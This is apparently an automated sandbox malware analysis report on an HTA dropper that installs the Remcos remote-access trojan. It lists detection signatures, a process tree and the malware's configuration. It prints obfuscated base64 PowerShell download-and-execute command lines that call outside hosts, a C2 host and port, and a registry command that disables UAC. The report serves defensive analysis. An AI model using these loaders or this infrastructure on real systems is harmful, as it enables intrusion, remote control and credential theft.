Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
clearentirethingwithbestnoticetheeverythinggooodfrome.hta

Overview

General Information

Sample name:clearentirethingwithbestnoticetheeverythinggooodfrome.hta
Analysis ID:1575615
MD5:5215d83b478d7a718062863c5efbbeeb
SHA1:9ac735295a8b3bc10740d50669f6fa5c81ae10ce
SHA256:af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
Tags:htauser-lontze7
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7372 cmdline: mshta.exe "C:\Users\user\Desktop\clearentirethingwithbestnoticetheeverythinggooodfrome.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7484 cmdline: "C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7528 cmdline: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7672 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 7728 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 6772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 4208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 1220 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 3448 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["kelexrmcadmnnccupdated.duckdns.org:14646:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B3IX49", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
clearentirethingwithbestnoticetheeverythinggooodfrome.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6b6f8:$a1: Remcos restarted by watchdog!
          • 0x6bc70:$a3: %02i:%02i:%02i:%03i
          0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
          • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
          • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x65a04:$str_b2: Executing file:
          • 0x6683c:$str_b3: GetDirectListeningPort
          • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x66380:$str_b7: \update.vbs
          • 0x65a2c:$str_b9: Downloaded file:
          • 0x65a18:$str_b10: Downloading file:
          • 0x65abc:$str_b12: Failed to upload file:
          • 0x66804:$str_b13: StartForward
          • 0x66824:$str_b14: StopForward
          • 0x662d8:$str_b15: fso.DeleteFile "
          • 0x6626c:$str_b16: On Error Resume Next
          • 0x66308:$str_b17: fso.DeleteFolder "
          • 0x65aac:$str_b18: Uploaded file:
          • 0x65a6c:$str_b19: Unable to delete:
          • 0x662a0:$str_b20: while fso.FileExists("
          • 0x65f49:$str_c0: [Firefox StoredLogins not found]
          Click to see the 21 entries
          SourceRuleDescriptionAuthorStrings
          12.2.CasPol.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            12.2.CasPol.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              12.2.CasPol.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                12.2.CasPol.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x6aaf8:$a1: Remcos restarted by watchdog!
                • 0x6b070:$a3: %02i:%02i:%02i:%03i
                12.2.CasPol.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x64e04:$str_b2: Executing file:
                • 0x65c3c:$str_b3: GetDirectListeningPort
                • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x65780:$str_b7: \update.vbs
                • 0x64e2c:$str_b9: Downloaded file:
                • 0x64e18:$str_b10: Downloading file:
                • 0x64ebc:$str_b12: Failed to upload file:
                • 0x65c04:$str_b13: StartForward
                • 0x65c24:$str_b14: StopForward
                • 0x656d8:$str_b15: fso.DeleteFile "
                • 0x6566c:$str_b16: On Error Resume Next
                • 0x65708:$str_b17: fso.DeleteFolder "
                • 0x64eac:$str_b18: Uploaded file:
                • 0x64e6c:$str_b19: Unable to delete:
                • 0x656a0:$str_b20: while fso.FileExists("
                • 0x65349:$str_c0: [Firefox StoredLogins not found]
                Click to see the 20 entries
                SourceRuleDescriptionAuthorStrings
                amsi32_7776.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  amsi32_7776.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthine, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JH
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICA